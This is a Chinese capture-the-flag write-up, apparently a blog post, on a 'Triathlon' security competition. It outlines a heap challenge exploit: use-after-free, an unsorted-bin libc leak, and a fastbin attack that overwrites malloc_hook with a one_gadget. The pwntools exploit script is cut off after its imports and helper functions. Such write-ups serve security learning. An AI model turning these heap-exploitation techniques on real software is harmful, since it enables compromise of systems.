信息安全铁人三项赛真题解析

铁人三项赛真题解析"/>

信息安全铁人三项赛真题解析

感谢各位师傅手下留情，感谢出题人不杀之恩

说一下，个人赛题目不难，都是UAF还有格式化字符串，很快打完，和各位师傅并列第一，然后就去企业渗透了，所以细节我这里就不啰嗦了，简单说一下思路然后直接贴exp。

个人赛

heap

功能很全，add、delete、show、edit。

主要漏洞点在delete中，UAF。因此直接unsorted bin leak libc再进行一次UAF fastbin attack即可，改malloc_hook为One_gadget(格式化字符串也能用，但是不用也ok)

#! /usr/bin/python

import sys

from pwn import *

from LibcSearcher import *

sl = lambda x:p.sendline(x)

sd = lambda x:p.send(x)

sda = lambda x,y:p.sendafter(x,y)

sla = lambda x,y:p.sendlineafter(x,y)

rv = lambda x:p.recv(x)

ru = lambda x:p.recvuntil(x)

ia = lambda :p.interac